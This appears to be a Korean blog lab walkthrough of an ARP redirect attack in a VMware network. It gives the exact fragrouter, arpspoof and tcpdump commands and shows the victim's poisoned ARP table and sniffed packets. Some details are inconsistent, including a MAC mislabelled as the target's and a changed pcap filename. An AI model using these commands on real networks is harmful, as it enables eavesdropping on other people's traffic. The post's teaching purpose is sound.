실습환경 : VMware 16
사용 프로그램 : fragrouter, tcpdump
network : NAT
공격자
IP : 192.168.11.19
h/w address : 00:0C:29:E3:D3:C0
공격 대상
IP : 192.168.11.77
h/w address : 00:0C:29:8F:7E:5F
라우터
IP : 192.168.11.1
h/w address : 00:50:56:FB:DC:5E
목차
1. 공격 전) 공격 대상의 네트워크 설정 확인
2. 공격자 PC에서 공격 실행
2-1. fragrouter 실행
2-2. arpspoff 실행
3. 공격 결과 확인
3-1. 공격 대상의 네트워크 설정 확인
3-2. 공격 대상에서 네트워크 접속 등의 활동 수행
3-3. 공격자 PC에서 도청한 패킷 확인
1. 공격 대상의 네트워크 설정 확인
공격 대상의 arp 테이블을 확인한다.
# arp -a
+) 실행 결과 텍스트
Microsoft Windows XP [Version 5.1.2600]
<C> Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\st> arp -a
Interface: 192.168.11.77 --- 0x10003
Internet Address Physical Address Type
192.168.11.1 00-50-56-fb-dc-5e dynamic
C:\Documents and Settings\st> arp -a
기존 라우터의 mac 주소(00:50:56:FB:DC:5E)가 저장되어 있다.
2. 공격자 PC에서 공격 실행
2-1. fragrouter를 실행해 패킷 릴레이를 활성화한다.
# fragrouter -B1
+) 실행 결과 텍스트
[root@linux32bit ~]# fragrouter -B1
fragrouter: base-1: normal IP forwarding
...
2-2. arpspoof를 이용해 arp 리다이렉트를 시작한다.
# arpspoof -i eth0 -t 192.168.11.77 192.168.11.1
+) 실행 결과 텍스트
[root@linux32bit ~]# arpspoof -i eth0 -t 192.168.11.77 192.168.11.1
0:c:29:e3:d3:c0 0:c:29:8f:7e:5f 0806 42: arp reply 192.168.11.1 is-at 0:c:29:e3:de:c0
0:c:29:e3:d3:c0 0:c:29:8f:7e:5f 0806 42: arp reply 192.168.11.1 is-at 0:c:29:e3:de:c0
...
...
(주기적으로 위조된 arp reply를 보낸다)
공격자 PC에서 해당 패킷들을 도청(스니핑)할 수 있다.
# tcpdump -i eth0 tcp port 80 and host 192.168.11.77 and ether host 00:0C:29:E3:D3:C0 -w 11-77.pcap* 파일 확장자를 .pcap으로 설정해야 wireshark에서 패킷을 확인할 수 있다.
3. 공격 결과 확인
3-1. 공격 대상의 네트워크 설정 확인
게이트웨이 (192.168.11.1)의 mac 주소가 공격 대상의 mac 주소(00:0C:29:E3:D3:C0)로 저장되어 있는 것을 확인할 수 있다.
3-2. 공격 대상에서 네트워크 접속 등의 활동 수행
패킷 릴레이를 설정해놓았기 때문에 외부와의 통신도 정상적으로 가능하다.
단, 게이트웨이를 통하는 모든 패킷이 공격자를 거쳐 전달되므로 공격자는 모든 패킷을 도청할 수 있다.
3-3. 공격자 PC에서 도청한 패킷 확인
공격 대상(192.168.11.77)이 게이트웨이(192.168.11.1)로 보낸 패킷들이 게이트웨이가 아닌 공격자에게 전송된 것을 확인할 수 있다.
# cat 11-17.pcap | more
+) 실행 결과 텍스트
01:21:26.322402 IP 192.168.11.77.videte-cipc > 223.130.193.11.http: Flags [R.],
seq 1195912352, ack 565929998, win 0, length 0
0x0000: 4500 0028 4b08 4000 8006 4344 c0a8 0b4d E..(K.@...CD...M
0x0010: df82 c10b 0787 0050 4748 2ca0 21bb 680e .......PGH,.!.h.
0x0020: 5014 0000 3dc4 0000 0000 0000 0000 P...=.........
01:21:26.322466 IP 192.168.11.77.videte-cipc > 223.130.193.11.http: Flags [R.],
seq 0, ack 1, win 0, length 0
0x0000: 4500 0028 4b08 4000 8006 4344 c0a8 0b4d E..(K.@...CD...M
0x0010: df82 c10b 0787 0050 4748 2ca0 21bb 680e .......PGH,.!.h.
0x0020: 5014 0000 3dc4 0000 P...=...
01:21:26.324528 IP 192.168.11.77.b-novative-ls > a23-201-36-184.deploy.static.ak
amaitechnologies.com.http: Flags [R.], seq 1731564530, ack 338911022, win 0, len
gth 0
0x0000: 4500 0028 4b12 4000 8006 a747 c0a8 0b4d E..(K.@....G...M
0x0010: 17c9 24b8 0768 0050 6735 93f2 1433 5f2e ..$..h.Pg5...3_.
0x0020: 5014 0000 3119 0000 0000 0000 0000 P...1.........
01:21:26.324650 IP 192.168.11.77.b-novative-ls > a23-201-36-184.deploy.static.ak
amaitechnologies.com.http: Flags [R.], seq 0, ack 1, win 0, length 0
0x0000: 4500 0028 4b12 4000 8006 a747 c0a8 0b4d E..(K.@....G...M
0x0010: 17c9 24b8 0768 0050 6735 93f2 1433 5f2e ..$..h.Pg5...3_.
0x0020: 5014 0000 3119 0000 P...1...
01:21:31.587031 IP 192.168.11.77.tapestry > 192.229.190.65.http: Flags [R.], seq
169432263, ack 799428990, win 0, length 0
wireshark로 확인한 모습
destination mac 주소는 공격자의 mac 주소로(00:0C:29:E3:D3:C0) 설정되어 있고,
source mac 주소는 공격 대상의 mac 주소로(00:0C:29:8F:7E:5F) 설정되어 있어
공격 대상의 패킷이 도청당한 것을 확인할 수 있다.
'Network > 공격 기법' 카테고리의 다른 글
| ARP 스푸핑 대처법 (0) | 2023.05.12 |
|---|---|
| DNS 스푸핑 (0) | 2023.05.11 |
| ARP 스푸핑 (0) | 2023.05.11 |
| ICMP 리다이렉트 (0) | 2023.05.10 |
| ARP 리다이렉트 (해설판) (0) | 2023.05.09 |
